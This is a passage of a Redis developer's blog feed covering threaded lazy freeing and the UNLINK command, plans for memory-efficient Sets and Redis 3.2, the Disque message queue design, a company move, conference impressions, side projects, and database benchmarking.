3. Rewrite lazyfree to be threaded.

The result is that Redis is now more memory efficient, since there are no robj structures around in the implementation of the data structures (they are still used in the code paths where there is a lot of sharing going on, for example during command dispatch and replication). Threaded lazy free works great and is faster than the incremental one at reclaiming memory, even if the incremental implementation is something I like a lot and was not so terrible even compared with the threaded one. But now you can delete a huge key and the performance drop is negligible, which is very useful. And, most interesting of all, Redis is now faster in all the operations I tested so far. Less indirection was the real winner here. It is faster even in unrelated benchmarks just because the client output buffers are now simpler and faster.
In the end I deleted the incremental lazy freeing implementation from the branch, to retain only the threaded one.

A note about the API


However, what about the API? We still have a blocking DEL, and its default behavior is the same, since DEL in Redis means: reclaim memory now. I didn’t like the idea of changing that. So now you have a new command called UNLINK which more clearly states what is happening to the value.

UNLINK is a smart command: it calculates the deallocation cost of an object, and if it is very small it will just do what DEL is supposed to do and free the object ASAP. Otherwise the object is sent to the background queue for processing. Apart from this, the two commands are identical from the point of view of the key space semantics.
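
Usage is identical to DEL (hypothetical key); the reply is the number of keys that were unlinked:

127.0.0.1:6379> UNLINK mybigset
(integer) 1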

Non-blocking variants of FLUSHALL / FLUSHDB were also implemented, but not as separate commands: they’ll just take a LAZY option that, if given, changes the behavior.

Not just lazy freeing


Now that the values of aggregate data types are fully unshared, and client output buffers don’t contain shared objects either, there is a lot to exploit. For example it is finally possible to implement threaded I/O in Redis, so that different clients are served by different threads. This means we’ll have a global lock only when accessing the database, but the client read/write syscalls, and even the parsing of the command the client is sending, can happen in different threads. This is a design similar to memcached, and one I look forward to implementing and testing.

Moreover it is now possible to implement certain slow operations on aggregate data types in another thread, in a way where only a few keys are “blocked” while all the other clients can continue. This can be achieved in a very similar way to what we currently do with blocking operations (see blocking.c), plus a hash table to store which keys are currently busy and by which client. So if a client asks for something like SMEMBERS, it is possible to lock just the key, process the request creating the output buffer, and later release the key again. Only clients trying to access the same key will be blocked, if the key is blocked.

All this requires even more drastic internal changes, but the bottom line here is: we have one taboo less. We can compensate for object copying times with fewer cache misses and a smaller memory footprint for aggregate data types, so we are now free to think in terms of a threaded Redis with a share-nothing design, which is the only design that could easily outperform our single-threaded one. In the past a threaded Redis was always seen as a bad idea if conceived as a set of mutexes in data structures and objects to implement concurrent access, but fortunately there are alternatives to get the best of both worlds. And we still have the option to serve all the fast operations from the main thread, as we did in the past, if we want. There should only be performance to gain, at the cost of some contained complexity.

ETA


I touched a lot of internals; this is not something that is going live tomorrow. So my plan is to call what we already have in unstable 3.2, do the work to put it into Release Candidate state, and merge this branch into unstable targeting 3.4.

However before merging, a very scrupulous check for speed regression should be performed. There is definitely more work to do.

If you want to give it a try, check the “lazyfree” branch on Github. Btw, be aware that I’m currently working on it very actively, so certain things may be totally broken at times.
http://antirez.com/news/93
About Redis Sets memory efficiency http://antirez.com/news/92 http://antirez.com/news/92 Fri, 28 Aug 2015 09:40:32 +0000
On Hacker News people asked why not use Redis instead: https://news.ycombinator.com/item?id=10118413

Amplitude developers have their set of reasons for not using Redis, and in general if you have a very specific problem and want to scale it in the best possible way, it makes sense to implement your own vertical solution. I’m not averse to reinventing the wheel: sometimes you want your very specific wheel, one that a general purpose system may not be able to provide. Moreover creating your own solution gives you control over what you did, boosts your creativity and your confidence in what you, as a developer, can do, and makes you able to debug whatever bug may arise in the future without external help.

On the other hand, of course, creating system software from scratch is a very complex matter. It requires constant development if there is a wish to actively evolve it, or it means having a stalled, non-evolving piece of code if there is no team dedicated to it. If it is very vertical and specialized, the new system is likely capable of handling only a slice of the whole application’s problems, and yet you have to manage it as an additional component. Moreover, if it was created mostly by one or a few programmers that later leave the company, then fixing and evolving it is a very big problem: there isn’t a sizable external community, nor are the original developers around.

Basically, writing things in house is not good or bad per se; it depends. Of course it is a matter of sensibility to understand when it’s worth implementing something from scratch and when it is not. Good developers know.

From my point of view, regardless of what the Amplitude developers’ final solution was, it is interesting to read about the process and why they are not using Redis. One of the concerns they raised is the overhead of the Set data type in Redis. I believe they are right to have such a concern: Redis Sets could be a lot more memory efficient, and weeks before reading the Amplitude article I had already started to explore ways to improve Sets’ memory efficiency. Today I want to share the plans with you.

Dual representation of data types
===

In the beginning there were plain data structures, implemented more or less as an algorithms textbook suggests: each node of the data structure is dynamically allocated. Allocation overhead, fat pointers, and poor cache locality are the big limits of this basic approach.

Pieter Noordhuis and I later implemented specialized versions of the Redis abstract data types, designed to be very memory efficient, using a single allocation to hold tens or a few hundred elements, sometimes with ad-hoc encodings to better use the space. Those versions of the data structures have O(N) time complexity for certain operations, or are sometimes limited to elements having a specific format (numbers) or size.

So for example when you create a Hash, it starts out represented in a memory efficient way which is good for a small number of elements. Later it gets converted into a real hash table if the number of elements reaches a given threshold. This means that the memory efficiency of a Redis data type depends a lot on the number of elements it stores.

The next step: Redis lists
===

At some point Twitter developers realized that there was no reason to go from an array of elements in a single allocation, representing the items of a List, to an actual linked list, which is a lot less memory efficient. There is something in the middle: a linked list of arrays, each representing a few items.
Their implementation does not handle defragmentation when you remove something from the middle. Pieter and I had tried in the past to understand whether this was worth it or not, but we had a feeling the defragmentation effort might not be compensated by the space savings, and a non-defragmenting implementation of this idea was too fragile as a general purpose implementation of Redis lists: remove a few elements from the middle and your memory usage changes dramatically.

Fortunately Matt Stancliff implemented the idea, including the defragmentation part, in an excellent way, and after some experimentation he showed that the new implementation was at least as good as the then-current implementation in Redis from the point of view of performance, and much better from the point of view of memory usage. Moreover the memory efficiency of lists was no longer a function of the size of the list, and there was a single representation to deal with.

Lists are kinda special, since a linked list of small arrays is really an optimal representation that may not map easily to other data types. Is it possible to do something like that for Sets and other data types?

Redis Sets
===

Sets’ memory usage is a bit special. Unlike all the other Redis data types, they don’t have a specialized representation for sets composed of strings. So even a very small Set is going to consume a lot of memory. A special representation actually exists and is excellent, but it only works if the Set is composed of just numbers and is small: in such a case, we represent the Set with a special encoding called “intset”. It is an ordered linear array of integers, so that we can use binary search to test for the existence of members. The array automatically changes the size of its elements depending on the largest element in the set, so representing a set that contains the strings 1, 20, 30, 15 is going to take just two bytes per element plus some overhead, because the strings can be represented as numbers, and are inside the 16 bit range. However just add “a” to the set, and it will be converted into a full hash table:

127.0.0.1:6379> sadd myset 1 2 3 4 5
(integer) 5
127.0.0.1:6379> object encoding myset
"intset"
127.0.0.1:6379> sadd myset a
(integer) 1
127.0.0.1:6379> object encoding myset
"hashtable"

Sets of integers are a heavily used data type in Redis, so it is actually very useful to have that. But why don’t we have a special representation for small sets composed of non-numerical strings, like we have for everything else? Well, the idea was that having a data type with *three* representations was not going to be a good thing from the point of view of Redis internals. If you check t_zset.c or t_set.c you’ll see it requires some care to deal with multiple representations. The more you try to abstract away dealing with N representations, the more you lose access to certain optimizations. Moreover the List story showed that it is possible to have a single representation with all the benefits. What you lose in terms of scanning the small aggregates containing N elements, you win back because of better cache locality, so it is possible to experiment with things that look like a tragic time/space tradeoff, but in reality are not.

Specializing Redis hash tables
===

Big hashes, non-numerical (or big) sets, and big sorted sets are currently represented by hash tables. The implementation is the one inside the dict.c file. It is a hash table implemented in a pretty conventional way, using chaining to resolve collisions. The special things in this hash table implementation are just two: it never blocks in order to rehash, the rehashing process being handled incrementally (I did this in the first months of my VMware sponsorship, and it was a big win in terms of latency, of course), and dict.c also implements a special primitive called “scanning”, invented by Pieter Noordhuis, which is a cursor-based iterator without overhead nor state, but with reasonable guarantees. Apart from that, the Redis hash table expects keys and values to be pointers to something, plus methods to compare and release keys, and to release values.

This is how you want to design a general purpose hash table: pointers and methods (function pointers) to deal with values everywhere. However Redis data structures have an interesting property: every element of a complex data structure is always, semantically, a string. Hashes are maps between string fields and string values. Sets are unordered sets of strings, and so forth.

What happens if we implement a hash table which is designed to store just string keys and string values? Well… it looks like there is a simple way to make such a hash table very memory efficient. We could set the load factor to something greater than 1, for example 10, so that if there are 5 buckets in the hash table, each bucket will contain on average 10 elements.

So each bucket will be something like a linear array of key-value items, with length prefixes, in a fashion very similar to the encodings we currently use for small data types. Something like:

0: <3>foo<3>bar<5>hello<6>world!<0>
1: <8>user:103<3>811 … <0>
2: … <0>

And so forth. The encoding could be specialized, or just something existing like MessagePack. So here the extra work you do in each bucket is hopefully compensated by the better locality you get.
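
A minimal sketch of how a lookup inside such a bucket could work (just an illustration of the encoding sketched above, with single-byte length prefixes and a 0 terminator for brevity; this is not the actual Redis implementation):

#include <stddef.h>
#include <string.h>

/* Scan a bucket encoded as <len><key><len><value>... pairs, terminated
 * by a 0 length byte. Return a pointer to the value bytes of the
 * matching key, or NULL. A real version would also return the value
 * length, which is the byte right before the returned pointer. */
const unsigned char *bucketFind(const unsigned char *bucket,
                                const char *key, size_t keylen)
{
    while (*bucket != 0) {
        size_t klen = *bucket++;             /* Key length prefix. */
        const unsigned char *k = bucket;
        bucket += klen;
        size_t vlen = *bucket++;             /* Value length prefix. */
        const unsigned char *v = bucket;
        bucket += vlen;
        if (klen == keylen && memcmp(k, key, keylen) == 0)
            return v;
    }
    return NULL;                             /* Not in this bucket. */
}

Scanning a whole bucket this way is O(number of elements in the bucket), but the bucket lives in one or a few contiguous cache lines, which is the whole point.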

Implementing scanning and incremental rehashing on top of this data structure is viable as well. I did an initial analysis, and while it is not possible to just copy the implementation in dict.c, it is possible to find other ways to obtain the same effects.

Note that, technically speaking, it is possible to store pointers in such a hash table: they will just be strings from the point of view of the hash table implementation, and it is possible to signal, in the hash table type, that those are pointers that need special care (for example via free-value function pointers or the like). However only testing can say whether it’s worth it or not.

However there are problems that must be solved in order to use this for more than sets, or at least in order to use *only* such a representation, killing the small-value representations we have currently. For example, the current small representations have a very interesting property: they are already a serialization of themselves, without extra work required. We use this to store data into RDB files, to transfer data between nodes in Redis Cluster, and so forth. The specialized hash table should hopefully have the same property, or at least each single bucket should already be in a serialized format without any post-processing work required. If this is not the case, we could use these new dictionaries only in place of the general hash tables after the expansion, which is already a big win.

Conclusions
===

This is an initial idea that requires some time for the design to be improved, validated by an implementation later, and load tested in depth to guarantee there is no huge regression in certain legitimate workloads. If everything goes well we may end up with a Redis server which is a lot more memory efficient than in the past. Such a hash table may also be used to store the main Redis dictionary, in order to make the per-key overhead much smaller.
http://antirez.com/news/92
Thanks Pivotal, Hello Redis Labs http://antirez.com/news/91 http://antirez.com/news/91 Wed, 15 Jul 2015 11:46:47 +0000
Thanks to the Pivotal sponsorship Redis was able to grow, reaching in recent years a diffusion which I never expected. However for the final user it has always been just a "pure" OSS project: go to the community web site, grab a tarball, read the free documentation, send a pull request, and watch the stream of commits as they happen live.

In order not to stop this magic from happening, and in order to have enough free time to spend with my family, during these years I made the decision not to start a Redis company. However I encouraged the creation of an economic ecosystem around Redis. There are multiple companies built around Redis doing well at this point. There is one, Redis Labs, that has done remarkably steady work over the years to build a very strong company, with a team of developers hacking on the core of Redis, and a great set of products that provide Redis users with the commercial options they need.

At some point it started to look like a good idea for me to move to Redis Labs. Running a big cluster of Redis instances and having a set of developers on the Redis core is a key asset for Redis's future. We can work together to improve Redis faster, with constant feedback about what happens in the wild with actual users running Redis, and the efforts required to operate it at scale.

Redis Labs was willing to continue what VMware and Pivotal started. I'll be able to work as I do currently, spending all my time on the open source side of the project, while Redis Labs continues to provide Redis users with a hassle-free Redis experience of managed instances and products. However, because of my close interaction with Redis Labs, I believe we'll see many more contributions from Redis Labs developers to the Redis core. Things like the memory reduction pull requests which are going to be part of Redis 3.2, or the improvements to the key eviction process they contributed for Redis 3.0, are a clear example of what happens when you have great developers working on Redis, able to observe a large set of use cases.

I, Pivotal, and Redis Labs all agree that this is important for the future of Redis, so I'm officially moving to Redis Labs starting from tomorrow morning. Thank you Pivotal and Redis Labs; we have more OSS code to ship in the next years, and this is just great.

EDIT: Redis Labs press release can be found here: https://redislabs.com/press-releases/redis-creator-salvatore-sanfilippo-antirez-joins-redis-labs
http://antirez.com/news/91
Commit messages are not titles http://antirez.com/news/90 http://antirez.com/news/90 Tue, 23 Jun 2015 08:55:22 +0000
This is a smart synopsis, as information dense as possible.

And when needed, this is the long version since:
1. I did this.
2. And it resulted in this.
3. And you can reproduce it this way.

So every time I'm told again not to put a dot at the end, I'll link to this article.

But no, it's not just a matter of a dot. If the first line of a commit message is a title, it changes *the way* you write it. It becomes just some text that introduces some more text, without any stress on information density. Coders gotta code, so if something can be told in a very short way in one line, do it, and reserve the additional information for the next lines, without sacrificing the first line just because "it's a title".

Moreover, programming is the art of writing synopses, otherwise you end up with programs much more complex than they should be. So perhaps it's also a good exercise for us.
http://antirez.com/news/90
Plans for Redis 3.2 http://antirez.com/news/89 http://antirez.com/news/89 Fri, 12 Jun 2015 13:53:53 +0000
Geo hashing API: This work originated in Ardb, which was originally a fork of Redis (https://github.com/yinqiwen/ardb), and was later extracted and improved by Matt Stancliff (https://matt.sh/redis-geo), who ported it to Redis. Open source is cool, eh? The code needs a refactoring effort since it currently duplicates parts of the sorted set implementation. It is not impossible that I may also change a few things about the API; I’m currently not sure. If there is something to fix, I’ll fix it. But the bottom line is: this is a great feature, and now that Matt is no longer contributing to Redis there is a huge risk of losing this work, so I’m going to do the effort of refactoring, reviewing and merging it as the first of the tasks for Redis 3.2. I think it is a very exciting addition to the Redis API.

Bloom filters: We’ll get bloom filters in 3.2. I’m not sure if this will be implemented as a String type feature like HyperLogLogs are; more likely it will be a new special type, since I’m interested in non-trivial semantics that are easier to provide as a new type. I have many design ideas for bloom filters, but I’m pretty sure I would like the ability to control the accuracy/space tradeoff from the API, perhaps not in the low-level form of specifying the number of bits and hash functions to use, but in some higher level way. Another thing I would love to have in this API is the ability of the bloom filter to auto-depollute itself (using multiple rotating filters or something like that). I’ll read all the available literature and decide what to do, but we’ll get this feature into 3.2.

Memory PRs: there are two important PRs from RedisLabs to improve Redis memory usage. We’ll get both merged.

Memory introspection command: A command that provides information about memory, like the LATENCY command but for memory usage. Hints about where memory is consumed, whether it’s just the RSS that is high because of past peak memory usage, hints about the amount of memory used by client output buffers, the ability to resize the hash tables to save some memory if needed, and so forth.

Some Redis Cluster multi-DC support. This will probably just be a “static” option for Cluster slaves so that they won’t take part in the promotion when the master fails. In this way, using CLUSTER FAILOVER TAKEOVER, it will be possible to promote all the slaves in a minority partition.

New List type operations: A few O(1) list operations like LMERGE, and O(N) operations that will normally be used with N very small, so that they are most of the time effectively O(1) operations, like operations to move N elements from one list to another.

AOF safety feature: https://github.com/antirez/redis/pull/2574

AOF rewrites optionally using an RDB preamble, so that rewriting the AOF and reloading back the content at startup is faster.

SPOP COUNT option (already implemented; 3.2 will be the first stable version to get it).

Redis Cluster redis-trib rebalance command, in order to automatically rehash keys to end up with a more homogeneous memory usage between nodes.

A few things originally planned for 3.2 were backported to 3.0 since they were safe. A recent example is ZADD with support for options like NX and XX. In general it is possible that a few more commands for existing types will be added to Redis 3.2. This is basically a Redis version designed to make the people happy who wanted more on the API side, since for a while we focused more on the operational aspects of Redis.
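
As a quick illustration of those ZADD options (hypothetical key): NX only adds new elements, XX only updates existing ones, and the reply counts the elements actually added.

127.0.0.1:6379> ZADD myzset NX 1 "member"
(integer) 1
127.0.0.1:6379> ZADD myzset XX 2 "member"
(integer) 0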

About the ETA: the work is starting Monday, and I hope it will not take longer than the end of September, when the first RC will be pushed. Once it is RC, the RC -> Stable transition time is not scheduled; it is a function of the reporting time of critical bugs. Once nobody notices more bad issues for a few weeks, we’ll go stable.

I’ll follow up with new blog posts about single entries listed above, like for the Geo hashing thing, the bloom filter final implementation and API description, and so forth.

In the meantime, have fun with Redis 3.0!
http://antirez.com/news/89
Adventures in message queues http://antirez.com/news/88 http://antirez.com/news/88 Sun, 15 Mar 2015 22:32:15 +0000
For a few months now I’ve spent ~15-20% of my time, mostly hours stolen from nights and weekends, working on a new system. It’s a message broker and it’s called Disque. I have an implementation of 80% of what was in the original specification, but I still don’t feel like it’s ready to be released. Since I can’t ship, I’ll at least blog… so here is the story of how it started and a few details about what it is.

~ First steps ~

Many developers use Redis as a message queue, often wrapped via some library abstracting away the Redis low level primitives, other times directly building a simple, ad-hoc queue using the raw Redis API. This use case is covered mainly using blocking list operations and list push operations. Redis apparently is at the same time the best and the worst system to use like that. It’s good because it is fast, easy to inspect, deploy and use, and in many environments it is already one piece of the infrastructure. However it has disadvantages because Redis’s mutable data structures are very different from immutable messages. Redis HA / Cluster tradeoffs are totally biased towards large mutable values, but the same tradeoffs are not the best ones for dealing with messages.

One thing that is important for a message broker to guarantee is that a message is delivered either at least once, or at most once. In short, given that guaranteeing exactly-once delivery of a message (where by delivery we intend a message that was received *and* processed by a worker) is practically impossible, the choices are that the message broker is able to guarantee either 0 or 1 deliveries, or 1 to infinite deliveries. This is often referred to as at-most-once semantics, and at-least-once semantics. There are use cases for the former, but the most interesting and practical semantics is the latter, that is, to guarantee that a message is delivered at least once, and delivered multiple times if there are failures.

So a few months ago I started to think about some client-side protocol to use a set of Redis masters (without replication or clustering whatsoever) in a way that provides these guarantees. Sometimes, with small changes in the way Redis is used for a use case, it is possible to end up with a better system. For example, for distributed locks I tried to document an algorithm which is trivial to implement but more robust than the single-instance + failover implementation (http://redis.io/topics/distlock).

However after a few days of work my design draft suggested that it was a better bet to design an ad-hoc system, since the client-side algorithm ended up being too complex and non-optimal, and certain things I absolutely wanted were impossible or very hard to do. Adding more things to Redis sounded like a bad idea; it does a lot of things already, and to cover messaging well I needed things which are very different from the way Redis operates. But why design a new system, given that the world is full of message brokers? Because an impressive number of users were using Redis instead of systems specifically designed for this goal, and this was strange. A few can be wrong, but so many must have some reason. Maybe Redis’s low barrier to entry, easy API, and speed were not what most people found when they looked at the message brokers landscape. It seems populated by solutions that are either too simple, asking the application to do too much, or too complex but super full featured. Maybe there is some space for the “Redis of messaging”?

~ Redis brutally forked ~

For the first time in my life I didn’t start writing code straight away. For weeks I looked at the design from time to time, reworked it into a new system rather than a Redis client library, and tried to understand, as a user, what would make me very happy in a message broker. The original use case remained the same: delayed jobs. Disque is a general system, but 90% of the time during the design the “reference” was a user that has to solve the problem of sending messages that are likely jobs to process. If something was against this use case, it was removed.

When the design was ready, I finally started to code. But where to start? “vi main.c”? Fortunately Redis is, in part, a framework for writing distributed systems in C. I had a protocol, network libraries, client handling, a node-to-node message bus. Rewriting all this from scratch sounded like a huge waste. At the same time I wanted Disque to be able to completely diverge from Redis in every detail if needed, and I wanted it to be a side project without impacts on Redis itself. So instead of attempting the huge undertaking of splitting Redis into an actual separate framework plus the Redis implementation, I took a more pragmatic approach: I forked the code, and removed everything that was Redis-specific from the source, in order to end up with a skeleton. At that point I was ready to implement my specification.

~ What is Disque? ~

After a few months of not very intense work and just 200 commits, I finally have a system that no longer looks like a toy. It looked like a toy for many weeks, so I was afraid of even talking about it, since the probability of me just deleting the source tree was big. Now that most of the idea is working code with tests, I’m finally sure this will be released in the future, and ready to talk about the tradeoffs I took in the design.

Disque is a distributed system by default. Since it is an AP system, it made no sense to have, like in Redis, a single-node mode and a distributed mode. A single Disque node is just a particular case of a cluster, having just one node.
So this was one of the important points in the design: fault tolerant, resistant to partitions, and available no matter how many nodes are still up, aka AP. I also wanted a system that was inherently able to scale in different scenarios, both when the issue is many producers and consumers with many queues, and when instead all these producers and consumers are focusing on a single queue, which may be distributed across multiple nodes.

My requirements were telling me aloud one thing… that Disque was going to make a big design sacrifice: message ordering. Disque only provides best-effort ordering. However, because of this sacrifice there is a lot to gain… tradeoffs are interesting, since sometimes they totally open up the design space.

I could continue recounting what Disque is like this way; however, a few months ago I saw a comment on Hacker News, written by Jacques Chester, see https://news.ycombinator.com/item?id=8709146 [EDIT: SORRY I made an error cut&pasting the wrong name of Adrian (Hi Adrian, sorry for misquoting you!)]. Jacques, who happens to work for Pivotal like me, was commenting on how different messaging systems have very different sets of features and properties, and how, without the details, it is almost impossible to evaluate the different choices, or to tell whether one is faster than another because it has a better implementation or simply because it offers a lot fewer guarantees. So he wrote a set of questions one should ask when evaluating a messaging system. I’ll use his questions, and add a few more, in order to describe what Disque is, in the hope that I don’t end up just hand waving, but provide some actual information.

Q: Are messages delivered at least once?

In Disque you can choose at-least-once delivery (the default), or at-most-once delivery. This property can be set per message. At-most-once delivery is just a special case of at-least-once delivery, obtained by setting the “retry” parameter of the message to 0 and replicating the message to a single node.
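
Since Disque is not released yet, the final command syntax may differ, but as a sketch of the semantics just described (names and options here are assumptions), adding a job replicated to three nodes with a 60 second retry time, versus an at-most-once job, could look like:

ADDJOB myqueue myjob 0 REPLICATE 3 RETRY 60
ADDJOB myqueue myjob 0 REPLICATE 1 RETRY 0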

Q: Are messages acknowledged by consumers?

Yes, the only way for a consumer to tell the system the message got delivered correctly is to acknowledge it.

Q: Are messages delivered multiple times if not acknowledged?

Yes, Disque will automatically deliver the message again after a “retry” time, forever (up to the max TTL of the message).
When a message is acknowledged, the acknowledgment is propagated to the nodes having a copy of the message. If the system believes everybody was reached, the message is finally garbage collected and removed. Acknowledged messages are also evicted during memory pressure.

Nodes run a best-effort algorithm to avoid queueing the same message multiple times, in order to better approximate single delivery. However, during failures multiple nodes may re-deliver the same message multiple times at the same time.

Q: Is queueing durable or ephemeral?

Durable.

Q: Is durability achieved by writing every message to disk first, or by replicating messages across servers?

By default Disque runs in-memory only, and uses synchronous replication to achieve durability (however you can ask, per message, for asynchronous replication). It is possible to turn on AOF (similar to Redis) if desired, if the setup is likely to see mass reboots or the like. When the system is upgraded, it is possible to write the AOF to disk just for the upgrade, in order not to lose state after a restart, even if normally disk persistence is not used.

Q: Is queueing partially/totally consistent across a group of servers or divided up for maximal throughput?

Divided up for throughput; however message ordering is preserved in a best-effort way. Each message has an immutable “ctime”, which is a wall-clock millisecond timestamp plus an incremental ID for messages generated in the same millisecond. Nodes use this ctime in order to sort messages for delivery.
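
A minimal sketch of that ordering rule (hypothetical names, not Disque’s actual internals):

#include <stdint.h>

/* Messages sort by wall-clock milliseconds first, and by a
 * per-millisecond counter for messages created in the same ms. */
typedef struct {
    uint64_t ms;    /* Wall-clock milliseconds at creation time. */
    uint64_t seq;   /* Incremental ID within the same millisecond. */
} msgctime;

/* qsort()-style comparator: older messages are delivered first. */
int ctimeCompare(const msgctime *a, const msgctime *b) {
    if (a->ms != b->ms) return a->ms < b->ms ? -1 : 1;
    if (a->seq != b->seq) return a->seq < b->seq ? -1 : 1;
    return 0;
}

Since wall clocks on different nodes are never perfectly synchronized, this also shows why the ordering can only be best-effort.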

Q: Can messages be dropped entirely under pressure? (aka best effort)

No. However, new messages may be refused if there is no space in memory. When 75% of memory is in use, nodes receiving messages try to replicate them externally, to other nodes, without taking a copy, but this may not work if the other nodes are also in an out-of-memory condition.

Q: Can consumers and producers look into the queue, or is it totally opaque?

There are commands to “PEEK” into queues.

Q: Is queueing unordered, FIFO or prioritised?

Best-effort FIFO-ish as explained.

Q: Is there a broker or no broker?

Broker as a set of masters. Clients can talk to whatever node they want.

Q: Does the broker own independent, named queues (topics, routes etc) or do producers and consumers need to coordinate their connections?

Named queues. Producers and consumers do not need to coordinate, since nodes use federation to discover routes inside the cluster and pass messages around as they are needed by consumers. However the client is provided with hints in case it is willing to relocate to where more consumers are.

Q: Is message posting transactional?

Yes, once the command to add a message returns, the system guarantees that there are the desired number of copies inside the cluster.

Q: Is message receiving transactional?

I guess not, since Disque will try to deliver the same message again if not acknowledged.

Q: Do consumers block on receive or can they check for new messages?

Both behaviors are supported; by default it blocks.

Q: Do producers block on send or can they check for queue fullness?

The producer may ask to get an error when adding a new message if the queue length is already greater than a specified value in the local node where it is pushing the message.

Moreover the producer may ask to replicate the message asynchronously if it wants to return ASAP and let the cluster replicate the message in a best-effort way.

There is no way to block the producer when there are too many messages in the queue, and unblock it as soon as there are fewer messages.

Q: Are delayed jobs supported?

Yes, with second granularity, up to years. However they’ll use memory.

Q: Can consumers and producers connect to different nodes?

Yes.

I hope that with this post Disque is a bit less vaporware. Sure, without looking at the code it is hard to tell, but at least now that the feature list is out you can already complain.
How much of the above is already implemented and working well? Everything but AOF disk persistence, and a few minor things I want to refine in the API, so the first release should not be too far away; but working on it so rarely, it is hard to move super fast.
http://antirez.com/news/88
Redis Conference 2015 http://antirez.com/news/87 http://antirez.com/news/87 Tue, 10 Mar 2015 09:22:20 +0000
The conference was organized by RackSpace in a masterly way, with RedisLabs, Heroku, and Hulu sponsoring it as well. I can’t say thank you enough times to everybody. Many people traveled from different parts of the US and from outside the US to SF just for a couple of days, the venue was incredibly cool, and everything was organized down to the finest details.

There was even an incredible cake for the Redis 6th birthday :-)

However the killer features of the conference were the number and the quality of the attendees (mostly actual Redis users), around 250 people, and the quality of the talks. The conference was free, even if it did not look like a free conference at all, at any level: an incredible stage to talk on, very high quality food, plenty of space. All this honestly helped create a setup for interesting exchanges. Everybody was using Redis for something, to get actual things done, and a lot of people shared their experiences. Among the talks I found the Hulu and Heroku ones extremely interesting, because they covered details about different use cases and operational challenges. I also happen to agree with Bill Andersen’s (from RackSpace) vision on benchmarking Redis in a use-case oriented fashion, even if I missed the initial part of his talk because I was being interviewed. The cool thing is, there will be recordings of the talks, so it will be possible for everybody to watch them when they become available at the conf site, which is http://redisconference.com

I was approached by several VeryLargeCompanies recounting stories of how they are using or are going to use Redis to do VeryLargeUseCase. Basically at this point Redis is everywhere.

The Redis Conference was a big gift to the Redis community… and in some way it shows very well how much there is a Redis outside Redis. I mean, at this point it has a life outside the borders of the server and client library repositories. It is a technology with many users that exchange ideas and work with it in different ways: internally at companies, to provide it as a technology covering a number of use cases, and also in the context of cloud providers, who offer it as a service to other companies.

One thing I did not like was Matt Stancliff’s talk. He tried to uncover different problems in the Redis development process, and finally proposed that the community replace me as the project leader, with him. In my opinion what Matt actually managed to do was to cherry-pick from my IRC, Twitter and Github issue posts in a very unfair way, in order to paint a bad image of me. I think this was a big mistake. Moreover he gave the talk as the last talk, not providing a right to reply. Matt and I happen to be persons with very different visions in many ways; however, Redis is a project I have invested many years into, and I’m not going to change my vision. I’m actually afraid I merged some code under pressure that I now find not well written or designed.

What prevents Redis from becoming a monoculture is its license: if the community at some point really believes it is possible to do much better, or simply to do things in a very different way, some forks will appear, and Darwinian selection will work to make sure we have the best Redis possible. Technical leadership is a reward for the work you are capable of doing; it is not something you ask for at conferences. Moreover technology is not just code, it is also about human interactions, and life is too short to interact with people we don’t share the same fundamental values with about what good behavior is.

Well, even if this left some bitter taste, overall the Redis Conference was a magical experience, and even Matt’s talk actually helped me to understand what to do in the future and what I want for this project. Thank you to those who made it possible and to all the attendees; I hope to see you again next year.
http://antirez.com/news/87
Side projects http://antirez.com/news/86 http://antirez.com/news/86 Thu, 26 Feb 2015 12:48:06 +0000
How did I stop doing new things in order to focus on a single effort, drastically monopolizing my professional life? It would have been too big a sacrifice for a human being with a limited life span. Fortunately I simply never did this; I never stopped doing new things.

If I look back at those 6 years, it was an endless stream of side projects, sometimes related to Redis, sometimes not.

1) Load81, children programming environment.
2) Dump1090, software defined radio ADS-B decoder.
3) A Javascript ray tracer.
4) lua-cmsgpack, C implementation of msgpack for Lua.
5) linenoise, a line editing library. Used in Redis, but, well, it was not our top priority.
6) lamernews, Redis-based HN clone.
7) Gitan, a small Git web interface.
8) shapeme, images evolver using simulated annealing.
9) Disque, a distributed queue (work in progress right now).

And there are many more throw-away projects not listed here.
The interesting thing is that many of the projects listed above are not random hacking efforts whose only goal was to make me happy. A few found their way into other people’s code.

Because of the side projects, I was able to do different things when I was stressed and drained from doing the same thing again and again. I could later refocus on Redis, and find again the right motivation to have fun with it, because small projects are cool, but working for years on a single project can provide more value for others in the long run.

So currently I’m using something like 20% of my time to hack on Disque, a distributed message queue. So only 80% is left for Redis development, right? Wrong. The real choice is between 80% of focus on Redis and 20% on something else, or 0% of focus on Redis in the long term, because in order to sustain a long term engagement, you need a long term alternative for exploring new things.

Side projects are the projects that make your bigger projects possible. Moreover they are often the start of new interesting projects. Redis itself was a side project of LLOOGG. Sometimes you stop working on your main project because of a side project, but when this happens it is not because the side project captured your focus: it is because you managed to find a better use for your time, since the side project turned out to be more important, interesting, and compelling than the main project.

Redis is six years old today, but it is aging well: it continues to capture the attention of more developers, and it continues to improve in order to provide a bit more value to users every week. However for me, more users, more pull requests, and more pressure do not mean changing my setup. What Redis is today is the sum of the work we put into it, and of the endurance shown over the course of six years. To continue along the same path, I’ll make sure to have a few side projects for the next years.

UPDATE: Damian Janowski provided an incredible present for the Redis community today: the renewed Redis.io web site is online now! http://redis.io. Thanks Damian!

HN comments here: https://news.ycombinator.com/item?id=9112250
http://antirez.com/news/86
Why we don’t have benchmarks comparing Redis with other DBs http://antirez.com/news/85 http://antirez.com/news/85 Thu, 29 Jan 2015 09:21:41 +0000
When you compare two databases, to get fair numbers, they need to share *a lot*: data model, exact durability guarantees, data replication safety, availability during partitions, and so forth. Often a system will score lower than another because it sacrifices speed in order to provide qualities that are less “hey look at me”, but very important nonetheless. Moreover the testing suite is a complex matter as well, unless the different database systems talk the same exact protocol: differences in the client library alone can account for large differences.

However there are people that beg to differ, and believe comparing different database systems for speed is a good idea anyway. For example, yesterday a benchmark of Redis and AerospikeDB was published here: http://lynnlangit.com/2015/01/28/lessons-learned-benchmarking-nosql-on-the-aws-cloud-aerospikedb-and-redis/.

I’ll use this benchmark to show my point about how benchmarks are misleading beasts. In the benchmark, huge EC2 instances are used for some strange reason: the instances are equipped with 244 GB of RAM (!). Those are r3.8xlarge instances. For my tests I’ll use a more real-world m3.medium instance.

Using such a beast of an instance, Redis was reported to be able to provide, in the single node case, 128k ops per second. My EC2 instance is much more limited: testing from another EC2 instance with redis-benchmark, not using pipelining, and with the same 100 bytes data size, I get 32k ops/sec, so my instance is something like 4 times slower in the single process case.
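For reference, a test like mine can be reproduced with a redis-benchmark invocation along these lines (the exact flags of my run are not reported in this post, so treat this as an approximation):

./redis-benchmark -h <master-ip> -t set,get -d 100 -r 10000000 -n 1000000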

